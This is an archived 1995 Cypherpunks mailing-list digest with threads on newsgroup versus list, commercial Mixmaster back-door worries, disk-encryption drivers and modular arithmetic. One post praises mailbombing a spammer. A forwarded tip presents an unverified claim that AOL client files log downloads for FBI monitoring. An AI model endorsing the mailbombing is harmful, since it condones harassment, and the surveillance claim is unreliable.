(assuming the stupid transitive definition of a > pornopage). > Start at your home page [...] One could define some kind of new metrics let dp(x) shortest number of hops to go from page x to any "porn" (sexy) page, Now, I bet that dp(x) < infinity for any page x that have links on their site that goes outside their site, thanks to the "strange attractor" represented by search engines & index, which are the most linked pages (mean dp) is prolly around 4 or 5 For instance, what is the pornography distance of whitehouse ? Without complete search, their dp(http://www.whitehouse.gov/)<=7 : -> textual representation of this page. {sorry, i had to go there,using lynx} http://www.whitehouse.gov/White_House/html/White_House_Home-plain.html -> Executive Branch (http://www.whitehouse.gov/White_House/EOP/html/3_parts-plain.html) -> government information locator service (GILS) (http://info.er.usgs.gov/gils/index.htm) -> IMAGINATION NEEDED HERE! (http://www.usgs.gov/public/gils/imagine.html) -> [Other Topics] {lots of remote pointers, but lots of outdated links too} (http://www.usgs.gov/public/gils/other.html) -> Another List of Internet Search facilities {netscape's search page} (http://home.mcom.com/home/internet-search.html) Search for "playboy" for instance at infoseek, or anything in fact... (btw where is that fast playboy's mirror ?) -> sexy pages! Regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From mfroomki at umiami.ir.miami.edu Sat Sep 16 11:29:28 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Sat, 16 Sep 95 11:29:28 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? In-Reply-To: Message-ID: newsgroups get more spam. I'm getting ads from "janet.dove" for magazines via this list as it is...something to do with a gateway to a newsgroup I fear. If it's a newsgroup, I'll probably read it less. " Life is too short for spam when you can have a Pommard." A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (soon to move to its real home): http://www.law.miami.edu/~mfroomki From liberty at gate.net Sat Sep 16 12:17:20 1995 From: liberty at gate.net (Jim Ray) Date: Sat, 16 Sep 95 12:17:20 PDT Subject: (noise) Re: SPAM bait Message-ID: <199509161913.PAA55049@tequesta.gate.net> nobody at alpha.c2.org (Anonymous) wrote: > >Don't worry, "Janet Dove", or actually sanghi3 at grfn.org got mailbombed >severely for this one. I'm just glad he doesn't know how to use remailers. Good going, Anonymous. What I don't understand about inappropriate SPAMs like that one (or telephone ads) is; what's the business incentive to do it? I assume that no Cypherpunk has subscribed to "Janet's" magazines, and I know that no Ray has _EVER_ spent money over a telephone unless we initiated the call, yet *still* we get unwanted calls every once-in-a-while. WHY? [Please respond privately to liberty at gate.net ] JMR From pcw at access.digex.net Sat Sep 16 12:22:24 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sat, 16 Sep 95 12:22:24 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: I saw "Hackers" yesterday. It's not bad and its political sensibility is very cyberpunk. The ad campaign even uses the tag line, "Their only crime is curiosity." Given that a major studio is spending beaucoup bucks to spread this tag line, I think it is safe to say that cyber issues are very mainstream by now. Still edgy enough to be exciting to many, but definitely comprehendable. The characters are just a bit too cool for school and some of the notes ring false. The evil one, a corporate computer security officer, would have been better served by someone who is not as laughable as Fischer Stevens. I could probably hit the escape key on my computer here and he would cringe. Jeremy Irons or Klaus-Maria Brandaur would have been more inspired. But they can't skateboard. I also stopped by the Department of Motor Vehicles yesterday. The lines were long and I soon found myself grousing along with the guy behind me. He was about 60 years old and not part of the cyberpunk generation in any way. After I said some libertarian thing by wondering aloud about why we even needed to have such a huge bureaucracy centered around cars, he said, "Yeah. Have you seen all the land they have down in Fort Meade. Beautiful land and they just spend their time down their spying on the people." He lumped the NSA in with the DMV. To him, it was just one big bureaucracy. -Peter From syrinx at c2.org Sat Sep 16 12:30:08 1995 From: syrinx at c2.org (syrinx@c2.org (Syrinx Anonymous Remailer)) Date: Sat, 16 Sep 95 12:30:08 PDT Subject: Commercial Mixmaster Message-ID: <199509161921.MAA05294@infinity.c2.org> nelson at crynwr.com (Russell Nelson) wrote: > There *will* always be a free version of the client with source > code, but the proprietary improvements will probably not be merged > into the free version. Lance, and only Lance, as copyright holder, > has the publish the code under a different copyright. It's the same > thing that Phil Z. did with ViacryptPGP. It's not the same thing, though. PGP 2.6.2 and PGP 2.7 are compatible. You can compile 2.6.2 from the sources and have it interoperate with Viacrypt 2.7. The concern is not "commercialization", per se, but rather the use of "commercialization" as an excuse to build in "proprietary" features (Back doors?) for which no corresponding source code is involved. Since no one has made a good case for there even being a COMMERCIAL market for Mixmaster, could there be other motives? Without building an anonymous e-$ infrastructure first, there's no way to even charge for the use of a remailing service without sacrificing anonymity, even if people were willing to pay to have messages anonymously remailed. No, I'm not accusing Lance. But if he no longer has the time to support Mixmaster, then perhaps some other crypto-friendly group should take over the task and keep it an OPEN system, with source code available. In fact, even freezing Mixmaster as is would be preferable to "improvements" that people don't/can't trust. True, they *COULD* provide source code, but how many commerical products come with complete source code? From dl at hplyot.obspm.fr Sat Sep 16 12:30:10 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Sat, 16 Sep 95 12:30:10 PDT Subject: Linking = Showing = Transferring? In-Reply-To: <9509151114.AA07872@sulphur.osf.org> Message-ID: <9509161929.AA08458@hplyot.obspm.fr> Rich Salz writes: > Inline images are not references -- they are part of the page being > retrieved. I don't agree... > > > >So that the image is *imported* by the *viewer*, and not supplied by > >www.obscura. indeed > Inlined images are just a convenient way of chunking. The image is imported > by the viewer because the server, as part of the base document, told it > to do so. You might be able to fool an ignorant court, but it still > doesn't change the fact that Lance has a document that in the natural > course of operation of the Web, exports crypto. ******* [...] Oh ? exports from Uk to Uk for instance ?? how could it export anything without any packet crossing a "border" even virtual ? Maybe it violates some rules about spreading information, knowledge of where to find 'offending' materials, but this is certainly not breaking any export rules... IMO dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From droelke at rdxsunhost.aud.alcatel.com Sat Sep 16 12:30:17 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Sat, 16 Sep 95 12:30:17 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? Message-ID: <9509161930.AA08524@spirit.aud.alcatel.com> Although Tim is quite happy with Eudora's (or whatever it is) email handeling techniques, I would also prefer a way in which to use my Usenet tools on the cypherpunks list. BUT I think that making it a newgroup opens up the volume to a level far beyond what it is now. It will also result in a far larger level of "noise" due mostly to cross-posts. My plan is to gate cypherpunks to a local newsgroup (local to my machine only) and read it that way. Is it more work for me that way? - yes, but I'ld prefer to do the extra work required than loose what this group has as a mailing list. Now - if someone wants to start a seperate alt.cypherpunks group, but *NOT* gateway this list to it - be my guest. People can then vote with their feet which is the better "medium" or transport method. Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From iagoldbe at csclub.uwaterloo.ca Sat Sep 16 12:40:45 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Sat, 16 Sep 95 12:40:45 PDT Subject: cypherpunks as a newsgroup In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk> Message-ID: <43f97c$64n@calum.csclub.uwaterloo.ca> In article , Dr. Dimitri Vulis wrote: >aba at dcs.exeter.ac.uk writes: >> One thing I have been thinking would be nice would be a USENET >> newsgroup, as mailing lists are a step away from easy access which >> some people never make. > >This sounds like a very good idea to me, since I find the flood of >e-mail from CP, much of it non-crypto-related, to be annoying. If >this traffic were in a newsgroup, it would travel compressed over >my phone line, and I might use a killfile on sstuff like the CO$ thread. > >Anything posted to the main cypherpunks mailing list and the spun-off mailing >lists (steganogrpahy, remailers, nym servers, etc) could be posted to the >newsgroup by maiking one of the mail2news gateways a subscriber. That was my thinking exactly. That's why I wrote just such a mail2news gateway to a local newsgroup, csc.lists.cypherpunks (moderated, with cypherpunks at toad.com as the moderator), as you can probably see in the header. This way, trn groups all articles with the same subject together, and correctly threads articles that have References: or In-Reply-To: headers. As for the location, I'd agree with comp.security.cypherpunks. Watch out, though; the list/group will probably get a much higher readership as a newsgroup. Although this is good for the "make the public aware" goal, remember that, as far as I can tell, September 1992 never ended. I've been very impressed with the signal/noise ratio on this list. In fact, people often put [NOISE] in the subject line to flag trivial content. This ratio will certainly go down if we go to a newsgroup. One of the main benefits of Usenet is that anyone can _post_. One of the main detriments is that _anyone_ can post. - Ian "that would have been much more elegant in Latin" From goedel at tezcat.com Sat Sep 16 12:47:13 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Sat, 16 Sep 95 12:47:13 PDT Subject: alt.cypherpunks Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Hi all, > >My vote is to let the folks on usenet sink in their own quagmire of >ignorance about what we do. This list is no secret. If somebody wants to >get into the 'game' let them bloody well subscribe. > >Ta ta. I should mention that the literate programming mailing list somehow died when it moved to comp.programming.literate. Something about the nature of usenet took the life out of it. Besides, does anyone want the inevitable "How can I get my Win95 PC to run doom?" questions? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMFs3bHIf3YegbdiBAQEu7AJWLFim1gdvzCy1+WpPzr8lxcDMmYcxIOyH 3XqR+7YSfEoPEW23Gq73BBU658leNKspGwJQ1a+7qnFsDRL1+TEe/V4meOwfyoWq aNcn =YLv5 -----END PGP SIGNATURE----- Dietrich Kappe | Red Planet http://www.redweb.com Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84 From rsalz at nntp.com Sat Sep 16 13:09:22 1995 From: rsalz at nntp.com (Rich Salz) Date: Sat, 16 Sep 95 13:09:22 PDT Subject: Commercial Mixmaster Message-ID: <199509162008.QAA06266@nntp.com> >The concern is not "commercialization", per se, but rather the use >of "commercialization" as an excuse to build in "proprietary" >features (Back doors?) for which no corresponding source code is >involved. > >Since no one has made a good case for there even being a COMMERCIAL >market for Mixmaster, could there be other motives? ... > >No, I'm not accusing Lance. But if he no longer has the time to >support Mixmaster, then perhaps some other crypto-friendly group >should take over the task and keep it an OPEN system, with source >code available. In fact, even freezing Mixmaster as is would be >preferable to "improvements" that people don't/can't trust. This doesn't make sense. Someone wants to commercialize Mixmaster. You don't know who it is, but you since you can't see how to make money doing this, you suspect their motives. Yet on the other hand, you think they will be so successful that enough people will buy binary-only servers such that backdoors are a real threat, perhaps by forcing people to upgrade or otherwise breaking interoperability with the current free-source remailer network. You can't have it both ways. But even if you could, there's a solution. :) Download the source and start releasing "blender", a free-source anonymous remail system that is upwardly compatibly, *and based on* the current Mixmaster. /r$ s From JohnHemming at mkn.co.uk Sat Sep 16 13:10:51 1995 From: JohnHemming at mkn.co.uk (John Hemming CEO MarketNet) Date: Sat, 16 Sep 95 13:10:51 PDT Subject: More on ECheques Message-ID: <1995-Sep16-205309.1> unicorn at polaris.mindport.net wrote: >> 1. I was not suggesting that you put your real bank account number >> in the program. A test number is perfectly adequate. >(But I will clone some checks and drain your account quickly). Really ..... how. From keelings at wu1.wl.aecl.ca Sat Sep 16 13:12:22 1995 From: keelings at wu1.wl.aecl.ca (S. Keeling) Date: Sat, 16 Sep 95 13:12:22 PDT Subject: WAS_tem (fwd) Message-ID: <9509162012.AA29482@wu1.wl.aecl.ca> Incoming from Rev. Ben: > > On Thu, 14 Sep 1995, James A. Donald wrote: > > > If you draw a picture using paintbrush of an underage person engaging > > in sexual conduct, you are in violation of this proposed legislation. > > Doesn't that directly contradict the stated purpose of existing child [snip] > > Do the lawyers on the list want to pipe up? On cypherpunks?!? Whatever for? I imagine there's already a rousing discussion going on about this somewhere in AOL. Take it there. -- "Remember, obsolescence (Win95) isn't an accident; it's an art form!" keelings at wu1.wl.aecl.ca s. keeling, aecl - whiteshell labs From alano at teleport.com Sat Sep 16 13:13:45 1995 From: alano at teleport.com (Alan Olsen) Date: Sat, 16 Sep 95 13:13:45 PDT Subject: SecureDrive News - Win95 yes, Iomega zip drive no Message-ID: <199509162013.NAA06723@desiree.teleport.com> At 02:33 AM 9/16/95 PDT, you wrote: >I'm sorry to report that SecureDrive does not support the Iomega ZIP >drive. I believe that's because the TSR driver supplied with the >hardware does not support a DiskBIOS interface. > >I had thought that Secure Device, another real-time encryption system, >would support this drive, since it works through a device driver >mapped to a dos file. But an actual trial proved otherwise. The >problem is that the DOS file must be present when the CONFIG.SYS >DEVICE= statement for the SECDEV.SYS is processed. But the zip drive >driver is a TSR that doesn't get loaded until after all DEVICE >statements have been processed. There's no particular reason that >Iomega couldn't have written their driver as an MSDOS device driver >rather than a TSR, in which case SecureDevice would probably work, but >they didn't, so it doesn't. There is a Win95 driver for the Zip drive that does not a TSR. It is a parallel to SCSI driver that is added through the "add hardware" control panel. I am not certain as to the order that the drivers load. I will have to test it. (The driver was released on the 9th of this month with little or no instructions.) Having encrypted Zip drives would be VERY useful. I will see if Borland's latest update for the C++ compiler has any additional information as to some of the driver interface issues (I doubt it, but it is worth a try). It is supposed to arrive "any day now", but it is backordered so who knows when I will get it. I may have to spend the bucks and get the Microsoft development disc subscription again. It will most likely have the information needed to convert the drivers to something Win95 will understand. | Visualize whirled keys | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From greg at ideath.goldenbear.com Sat Sep 16 13:16:49 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sat, 16 Sep 95 13:16:49 PDT Subject: C-punks, marketing for the masses Message-ID: <199509162008.AA03860@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- No disrespect intended, but I think that the various "let's sanitize the Cypherpunk message for mass acceptance" marketing/soundbite proposals are pointless. Cypherpunks is a mailing list, not a political party (or a platform). - From my perspective, the organizing meme for the list is not "strong crypto is really important, so let's write some and lobby our lawmakers to make sure it stays legal" but "strong crypto is here and is changing the dynamics of force, politics, and power, so let's see what we can do with it." (And no, I don't think it's important to spread that "meme" (a term I use with some trepidation) around to get "market share" for it. Ideas are not football teams nor initiative proposals.) I appreciate and support and have participated in various write-yer- legislator activities. They're useful short-term. But if Tim May and Duncan Frissell and the other list members who've dared to make predictions about the impact of crypto on government and economics are correct, what the government and the legislators want doesn't matter. If they're wrong, what we want doesn't matter. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFsujH3YhjZY3fMNAQHfogP9HMEe6/N7B0q4cov8knythwuqha4yFmsR Yfxtp8/ukXhfJlJQ5Mb40AYWcNwWGXmzd8J2KzrYBntKN60SZnd/StRQfHs6rtre hLHZGss4bR1c9w0+Jsr3TKD5UQe2up2cEuY9u6qN6QyVK9h9QtfSHpJqb3bAZlla fA3GMtB2qlc= =Phdj -----END PGP SIGNATURE----- From greg at ideath.goldenbear.com Sat Sep 16 13:17:59 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sat, 16 Sep 95 13:17:59 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <199509162015.AA03916@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Black Unicorn writes: > Some months ago I called for advanced stego and stealth PGP as well as > larger keys in the event we all had to go "into the crypto closet" for a > time. > I call for them again. I know of three ways to get software: 1. Write it yourself. 2. Pay someone else to write it. 3. Find software someone else wrote that meets your needs. If (3) isn't working, perhaps you should try (1) or (2). (I've been "calling for" a big house with a hot tub for years now. Still no progress. I'll let you know if it works out.) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFswPX3YhjZY3fMNAQHatwP/ZJKuNEDRPdCldyvshGkG/w/io+37zx3m DyJ4h1+OicxYCtKbolXYVcX8C4d1j7hXY2sesepcDvYYyy+butdQ+/2tw3u0FW1j WpfCGURpypBVb5T7QlL21Qv39cBIu9mJxkasPkQSeSnrC24eGtoItmZzrIRZgJyj Dj2FOIfxiFY= =5DwJ -----END PGP SIGNATURE----- From alano at teleport.com Sat Sep 16 13:41:36 1995 From: alano at teleport.com (Alan Olsen) Date: Sat, 16 Sep 95 13:41:36 PDT Subject: cypherpunks as a newsgroup Message-ID: <199509162041.NAA10780@desiree.teleport.com> At 03:40 PM 9/16/95 -0400, Ian wrote: >I've been very impressed with the signal/noise ratio on this list. >In fact, people often put [NOISE] in the subject line to flag trivial >content. This ratio will certainly go down if we go to a newsgroup. I have a group of friends who get forwarded the "best" of the Cypherpunks list. The signal to noise ratio is high enough that I have to be careful how much I forward lest I get complaints at the volume of what I forward. Turning this into an alt group would destroy that. >One of the main benefits of Usenet is that anyone can _post_. >One of the main detriments is that _anyone_ can post. How true. | Visualize whirled keys | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From ic58 at jove.acs.unt.edu Sat Sep 16 13:42:18 1995 From: ic58 at jove.acs.unt.edu (Childers James) Date: Sat, 16 Sep 95 13:42:18 PDT Subject: Newbie Crypto question: MOD? Message-ID: Ok folks, I recently received "Applied Cryptography" as a gift, and just have one question: How does the MOD function work in crypto functions? It seems to work differently than what I've seen before, i.e.: C/C++ MOD. I also didn't see anything in TCM's FAQ... If this is considered noise, I apologize in advance. "Freedom is meaningless unless | ic58 at jove.acs.unt.edu - James Childers you can give to those with whom| No man's freedom is safe you disagree." - Jefferson | while Congress is in session EA 73 53 12 4E 08 27 6C 21 64 28 51 92 0E 7C F7 From darkness at darkness.vnet.net Sat Sep 16 13:55:25 1995 From: darkness at darkness.vnet.net (darkness at darkness.vnet.net) Date: Sat, 16 Sep 95 13:55:25 PDT Subject: SecureDrive News - Win95 yes, Iomega zip drive no In-Reply-To: <199509162013.NAA06723@desiree.teleport.com> Message-ID: <199509162056.QAA03317@darkness.vnet.net> -----BEGIN PGP SIGNED MESSAGE----- >Date: Sat, 16 Sep 1995 13:13:49 -0700 >From: Alan Olsen > >At 02:33 AM 9/16/95 PDT, you wrote: > >>I'm sorry to report that SecureDrive does not support the Iomega ZIP >>drive. I believe that's because the TSR driver supplied with the >>hardware does not support a DiskBIOS interface. >> >>I had thought that Secure Device, another real-time encryption system, >>would support this drive, since it works through a device driver >>mapped to a dos file. But an actual trial proved otherwise. The >>problem is that the DOS file must be present when the CONFIG.SYS >>DEVICE= statement for the SECDEV.SYS is processed. But the zip drive >>driver is a TSR that doesn't get loaded until after all DEVICE >>statements have been processed. [...] Have you tried an 'INSTALL=' line in the CONFIG.SYS to load the drive's TSR first? INSTALL is a rarely-documented feature for the CONFIG.SYS to load a TSR during its processing. I believe it also saves memory by not loading some sort of header to into memory (DOS PSP maybe?), which may also cause a problem. Can't hurt to try though, eh? darky - -- ============================================+================================ darkness (darky) || keys under 'darkness' | 596F7527766520676F742061206672 PGP mail preferred || Key on public servers | 69656E6420696E204269672042726F email: darkness at darkness.vnet.net | 746865722053656375726974792E0A KeyID: D7E4CA65 / PGPprint = 43 1A 4A 36 4E 79 55 40 04 A1 CA F0 B9 BC 45 86 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFs6EpaAhnnX5MplAQGCUQP9Fb2oUikx9qEHJXBb4nZHtTjZewwn9FZt UZFxAf42IOyCFKxayanJTkwWkJQqDvetg1P0wvOrK+IRWxvmfvxze/pXQBrGAaqS oKGdhW0C5Wjol2ffgATh0K3a3ztd/klRd0dySQMISxz/DTcqvTxtW5n7+965VJT+ 5akW4nJL558= =YrYU -----END PGP SIGNATURE----- From vznuri at netcom.com Sat Sep 16 13:58:21 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sat, 16 Sep 95 13:58:21 PDT Subject: AOL monitoring Message-ID: <199509162055.NAA22204@netcom3.netcom.com> hello, apparently the recent FBI sting happened with the cooperation of AOL, which allowed the FBI to monitor downloads.. here's some info to test if you are being monitored on AOL ------- Forwarded Message Date: Sat, 16 Sep 1995 14:47:38 -0400 To: snet-l at world.std.com From: Charles Zeps Subject: How to find out if you are sniffed at AOL > America Online Opens Private E-mail to Federal Sting > (c) 1995 N.Y. Times News Service > >(14 Sept. 1995 ) Responding to court orders related to a >nationwide crackdown on the electronic transmission of child pornography, >America Online, the nation's largest information service, gave law >enforcement agents access to the private electronic mailboxes of an unknown >number of its subscribers, company officials confirmed Thursday. From: Eric Muetterties All you America online users would be wise to check out your software...(WINDOWS) Use a file viewer that will allow you to view in hexadecimal.Or use the DOSSHELL.EXE program in your DOS directory and use the menu to VIEW file contents Find your Aonline directory and find the directory marked IDB. This should have two files marked with your screen name and a suffix of either .arh or .pnd (eg. ericmuette.arh) With the file loaded in the viewer you will see the hex dump of these files. In the side pane will be the equivalent ascII of the hexadecimal dump (in laymans terms... if there is text you will recognize it...) Use PAGE DOWN to move down through the files.... soon you will recognize the first files you downloaded and references to where you were on the internet and what directory you saved the file to. Make these files READ ONLY with the file attributes menu in your file manager and they can not use this facility../ You will get an error message when you first start up ("XFER ERROR - - - could not create database") Click on "OK" and program will continue. Then when program gives you messages when you try to save to disk or download something just click on "IGNORE" till program continues (usually 3 times). When they realize everyone is defeating this they can easily come up with a more covert way of tracking you but in the meantime... ... better to change to another provider... You will be amazed at your freinds expressions when you get on their computer and tell them what they have downloaded. If you view the files in the TOOLS directory , at the end of the files you will find the internal names for these programs such as "Internal DAtabase" , ETC. !!! Have fun... Big Bro is here in a BIG WAY... MIND YOUR P's and Q's on the NET !!! E. Muetterties If you can't figure out how to do this email me with what is in your "IDB" directory and I'll tell you which files to view. ericm3 at ix.netcom.com Linda Thompson American Justice Federation Home of AEN News and "Waco, the Big Lie" "America Under Siege" 3850 S. Emerson Ave. Indianapolis, IN 46203 Telephone: (317) 780-5200 Fax: (317) 780-5209 Internet: lindat at iquest.net "When even one American -- who has done nothing wrong -- is forced by fear to shut his mind and close his mouth, then all Americans are in peril." Harry Truman From dan at milliways.org Sat Sep 16 14:14:07 1995 From: dan at milliways.org (Dan Bailey) Date: Sat, 16 Sep 95 14:14:07 PDT Subject: Rosing's Elliptic curve documentation question Message-ID: <199509162113.AA09748@ibm.net> I was reading Mike Rosing's documentation for his elliptic curve system from the Cypherpunks FTP site. In it, he uses the notation: sum a_i*b^2^i Now, like a good little Calculus 2 student, I assumed this must be a regular summation. But if so, which is the index of summation, and what are the bounds of summation? Someone want to give me a clue as to what this notation means? Dan Bailey *************************************************************** #define private public dan at milliways.org Worcester Polytechnic Institute and The Restaurant at the End of the Universe *************************************************************** From alano at teleport.com Sat Sep 16 14:25:54 1995 From: alano at teleport.com (Alan Olsen) Date: Sat, 16 Sep 95 14:25:54 PDT Subject: [NOISE] Re: SecureDrive News - Win95 yes, Iomega zip drive no Message-ID: <199509162125.OAA17362@desiree.teleport.com> At 04:56 PM 9/16/95 -0400, darky wrote: > Have you tried an 'INSTALL=' line in the CONFIG.SYS to load >the drive's TSR first? INSTALL is a rarely-documented feature for the >CONFIG.SYS to load a TSR during its processing. I believe it also >saves memory by not loading some sort of header to into memory (DOS >PSP maybe?), which may also cause a problem. Can't hurt to try >though, eh? After thinking about this (and drinking more coffee) I realized that he is loading the GUEST.EXE driver. This is not the best way to get the Zip drive to work. (It is meant as a temporary fix.) There is actually a set of drivers that can be installed in the config.sys file. (Check the documentation for installing the ASPI drivers and install the PPA3 driver as the first of the three.) This is poorly documented by Iomega, but it works. | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From carolab at censored.org Sat Sep 16 14:44:19 1995 From: carolab at censored.org (Censored Girls Anonymous) Date: Sat, 16 Sep 95 14:44:19 PDT Subject: AOL monitoring In-Reply-To: <199509162055.NAA22204@netcom3.netcom.com> Message-ID: Thanks for the kewl.rad.tip Love Always, Carol Anne On Sat, 16 Sep 1995, Vladimir Z. Nuri wrote: > hello, apparently the recent FBI sting happened with the cooperation > of AOL, which allowed the FBI to monitor downloads.. > > here's some info to test if you are being monitored on AOL Member Internet Society - Certified BETSI Programmer - WWW Page Creation ------------------------------------------------------------------------- Carol Anne Braddock <--now running linux 1.0.9 for your pleasure carolann at censored.org __ __ ____ ___ ___ ____ carolab at primenet.com /__)/__) / / / / /_ /\ / /_ / carolb at spring.com / / \ / / / / /__ / \/ /___ / ------------------------------------------------------------------------- A great place to start My Cyber Doc... From unicorn at polaris.mindport.net Sat Sep 16 14:44:32 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 16 Sep 95 14:44:32 PDT Subject: cypherpunks as a newsgroup In-Reply-To: <199509162041.NAA10780@desiree.teleport.com> Message-ID: On Sat, 16 Sep 1995, Alan Olsen wrote: > I have a group of friends who get forwarded the "best" of the Cypherpunks > list. The signal to noise ratio is high enough that I have to be careful > how much I forward lest I get complaints at the volume of what I forward. > Turning this into an alt group would destroy that. I don't understand this tendency to want to TURN the list into anything. Leave the list, and start an alt.* group if you like. I prefer the list, but will look at the group from time to time. Why must this be an either/or choice? --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From don at cs.byu.edu Sat Sep 16 15:04:33 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Sat, 16 Sep 95 15:04:33 PDT Subject: All Online Lusers, cryptoTCP Message-ID: <199509162112.PAA02177@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- Well, I read the tip on how to find out if AOL is checking what I download. The good news is, they're DEFINATELY NOT. ;) Anybody have a link to the encrypted TCP driver? I remember the original annoucement didn't give a link. Don "So what you're saying is, if too many people are breaking into my house, I should leave the key under the doormat so the police can chase the crooks???" -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMFs9VMLa+QKZS485AQFXuQL7Bd/u6MznUCYTMdKbIT4P+6IVj+j4IXjO CL4kg2tGefOKq5RD543ThP4PQx1HghIU1dHTg5ZeF9c52JE0owNFuRa2GgfDld5s SzZrlhmff0kqMdn6QyV4+mCICmiX9BnS =NsVn -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From syrinx at c2.org Sat Sep 16 15:11:20 1995 From: syrinx at c2.org (syrinx@c2.org (Syrinx Anonymous Remailer)) Date: Sat, 16 Sep 95 15:11:20 PDT Subject: Commercial Mixmaster Message-ID: <199509162201.PAA14969@infinity.c2.org> Rich Salz wrote: > >No, I'm not accusing Lance. But if he no longer has the time to > >support Mixmaster, then perhaps some other crypto-friendly group > >should take over the task and keep it an OPEN system, with source > >code available. In fact, even freezing Mixmaster as is would be > >preferable to "improvements" that people don't/can't trust. > > This doesn't make sense. > > Someone wants to commercialize Mixmaster. You don't know who it is, > but you since you can't see how to make money doing this, you suspect > their motives. Yet on the other hand, you think they will be so > successful that enough people will buy binary-only servers such that > backdoors are a real threat, perhaps by forcing people to upgrade > or otherwise breaking interoperability with the current free-source > remailer network. > > You can't have it both ways. Of course not, but it only has to *LOOK* that way. What if, let's say, that this new "commercial" venture offers their "new, improved" version FREE for individual and non-profit use, much like Netscape is now offered, while supposedly working on the "commercial" development of the product. Now you've got a free product in the hands of end-users, plus it's compiled to support DOS, Win 3.1, Win95, Mac platforms, etc., as well as the current Unix. It doesn't matter if a commercial market is EVER developed, just so long as you provide a suitable "cover" motive for giving it away. Of course, source code is still not provided, since that would supposedly give competitors (for this supposedly developing commercial market) knowledge of the proprietary improvements. The idea would be to take a standardized product and "steal" market share from the various PGP-chaining schemes, while doing it in such a way to provide a back door of participating TLAs. Mixmaster is a superior product to the other schemes, but it suffers from lack of user-friendliness and availability on commonly-used platforms. Think about this: if you were a TLA, can you think of a more cost-effective solution for keeping tabs on the increasingly THREATENING (to them) growth of anonymous e-mail? IOW, invest a few million to get a Trojan Horse crypto product into people's hands that they THINK is secure, and thus trust. Do you think they could use brute force to crack large quantities of IDEA or 3DES encrypted traffic for less money? If they can't crack PGP, then get people to switch to something they *THINK* is "more secure". > But even if you could, there's a solution. :) Download the source > and start releasing "blender", a free-source anonymous remail system > that is upwardly compatibly, *and based on* the current Mixmaster. I think that's what I suggested, isn't it? Hopefully it will be a foreign (ITAR-exempt) individual or group. From aba at dcs.exeter.ac.uk Sat Sep 16 15:31:40 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Sat, 16 Sep 95 15:31:40 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? Message-ID: <16598.9509162230@exe.dcs.exeter.ac.uk> Tim May writes: > Should there be an "alt.cypherpunks" type of newsgroup instead of this > mailing list? Not instead of, that would *kill it* with all the effects every one has been quick to point out, things like more noise, cross posts, loss of community like atmosphere. Please don't anyone do that! My 2nd post on the subject just before yours in my mbox, contains my negative views on this idea. I just thought it would be a good medium for a separate discussion forum for Peter's proposed 'technology transfer', and public awareness idea. I am really not keen on combining the two, I think if it there is a need for it, and it gets created at all, it should be as a separate forum. > It would be easy to create "alt.cypherpunks." I've been expecting to > see it happen for the last 3 years. It could still happen. In fact, > there's been talk of doing it (sorry for the passive "there has been > talk," but I'll let the folks talking about doing it do the talking > about it here). Sure, alt groups are easy to create there was a series of them in our spool with names from alt.-.-.-.-.0.0.0.0.0 through 